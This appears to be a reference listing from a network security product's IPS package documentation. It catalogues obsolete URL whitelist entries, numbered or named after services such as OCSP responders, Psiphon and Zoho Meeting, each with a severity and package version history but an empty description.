About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212057

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212058

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212059

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212060

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212061

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212062

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212063

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212064

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212065

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212066

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212067

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212068

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212069

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212070

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212071

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212072

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212073

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212074

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212075

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212076

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212077

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212078

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212079

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212080

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212081

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212082

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212083

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212084

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212085

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212086

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212087

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212088

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212089

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212090

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212091

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212092

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212093

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212094

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212095

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212096

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212097

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212098

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212099

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212100

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212101

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212102

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212103

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212104

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212105

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212106

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212107

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212108

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212109

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212110

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212111

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212112

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212113

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212114

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212115

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212116

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212117

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212118

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212119

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212120

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212121

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212122

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212123

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212124

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212125

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212126

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212127

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212128

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212129

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212130

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212131

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212132

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212133

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212134

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212135

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212136

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212137

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212138

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212139

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212140

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212141

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212142

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212143

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212144

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212145

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212146

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212147

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212148

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212149

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212150

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212151

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212152

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212153

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212154

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212155

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212156

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212157

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212158

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212159

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212160

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212161

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212162

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212163

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212164

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212165

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212166

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212167

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212168

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212169

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212170

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212171

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212172

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212173

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212174

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212175

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212176

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212177

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212178

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212179

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212180

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212181

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212182

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212183

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212184

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212185

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212186

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212187

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212188

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212189

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212190

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212191

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Description:
Back to top

URLList 3212192

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Description:
Back to top

URLList 3212193

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1787-5242
Last changed: sgpkg-ips-1787-5242
Description:
Back to top

URLList 3212194

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Description:
Back to top

URLList 3212195

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Description:
Back to top

URLList 3212196

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Description:
Back to top

URLList 3212197

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1796-5242
Last changed: sgpkg-ips-1796-5242
Description:
Back to top

URLList 3212198

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1796-5242
Last changed: sgpkg-ips-1796-5242
Description:
Back to top

URLList 3212199

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Description:
Back to top

URLList 3212200

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Description:
Back to top

URLList 3212201

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1803-5242
Last changed: sgpkg-ips-1803-5242
Description:
Back to top

URLList 3212202

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1806-5242
Last changed: sgpkg-ips-1806-5242
Description:
Back to top

URLList 3212203

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Description:
Back to top

URLList 3212204

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1828-5242
Last changed: sgpkg-ips-1828-5242
Description:
Back to top

URLList 3212205

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1828-5242
Last changed: sgpkg-ips-1828-5242
Description:
Back to top

URLList 3212206

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Description:
Back to top

URLList 3212207

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Description:
Back to top

URLList 3212208

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1836-5242
Last changed: sgpkg-ips-1836-5242
Description:
Back to top

URLList 3212209

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1836-5242
Last changed: sgpkg-ips-1836-5242
Description:
Back to top

URLList 3212210

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Description:
Back to top

URLList 3212211

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Description:
Back to top

URLList 3212212

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Description:
Back to top

URLList 3212213

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1859-5242
Last changed: sgpkg-ips-1859-5242
Description:
Back to top

URLList for Comodo-OCSP

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Description:
Back to top

URLList for Godaddy-OCSP

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Description:
Back to top

URLList for Jitsi-Meeting

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1634-5242
Description:
Back to top

URLList for Microsoft-Certificate-Revocation-List-Service

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1741-5242
Last changed: sgpkg-ips-1741-5242
Description:
Back to top

URLList for Microsoft-Online-Certificate-Status-Service

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Description:
Back to top

URLList for Psiphon

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1671-5242
Last changed: sgpkg-ips-1671-5242
Description:
Back to top

URLList for Suspicious Host

About this situation:
Context: URL whitelist
Severity: 1
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1873-5242
Description:
Back to top

URLList for Zoho-Meeting-App

About this situation:
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Description:
Back to top

URL_Category-Accounting

